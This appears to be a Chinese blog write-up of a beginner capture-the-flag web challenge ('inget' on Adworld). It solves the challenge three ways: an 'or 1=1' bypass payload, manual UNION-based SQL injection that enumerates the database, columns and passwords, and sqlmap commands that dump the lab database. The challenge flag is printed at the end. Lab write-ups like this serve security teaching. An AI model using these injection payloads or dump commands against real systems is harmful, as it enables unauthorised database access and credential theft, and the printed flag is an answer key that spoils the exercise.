攻防世界WEB(新手模式)14-inget

目录

方法一

方法二

方法三


打开环境只有简短的一句话

意思是:输入id,并尝试绕过

确实没什么反应,需要尝试绕过。。下面搜集了三种方法供大家“食用”

方法一

食用万能密码,直接爆破出来

?id='or' 1=1#

方法二

先手动判断类型

?id=1' union select 2,3 --+

查看回显

?id=1' union select 2,database() --+

2作为一个攻击量,database()尝试返回当前数据库名称

爆出数据库名称,继续查询该数据库内字段

?id=1' union select 2,group_concat(column_name) from information_schema.columns where table_name = 'cyber' --+

发现了三个字段,查看pw(因为他是password的缩写,第一怀疑他)

?id=1' union select 2,group_concat(pw) from cyber.cyber --+

得到flaG

方法三

食用sqlmap,先输入sqlmap判断自己是否有

sqlmap -u "http://61.147.171.105:49823/index.php?id=1" -dbs

爆出数据库(记得把端口改成自己靶机de,不然会报错0)

查看数据库

sqlmap -u "http://61.147.171.105:49823/index.php?id=1" -D cyber --dump

不确定的话可以把所有数据库都看一遍,寻找flag

cyberpeace{a68e3cc75a79661999bbdd7cd8bcf1fd}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值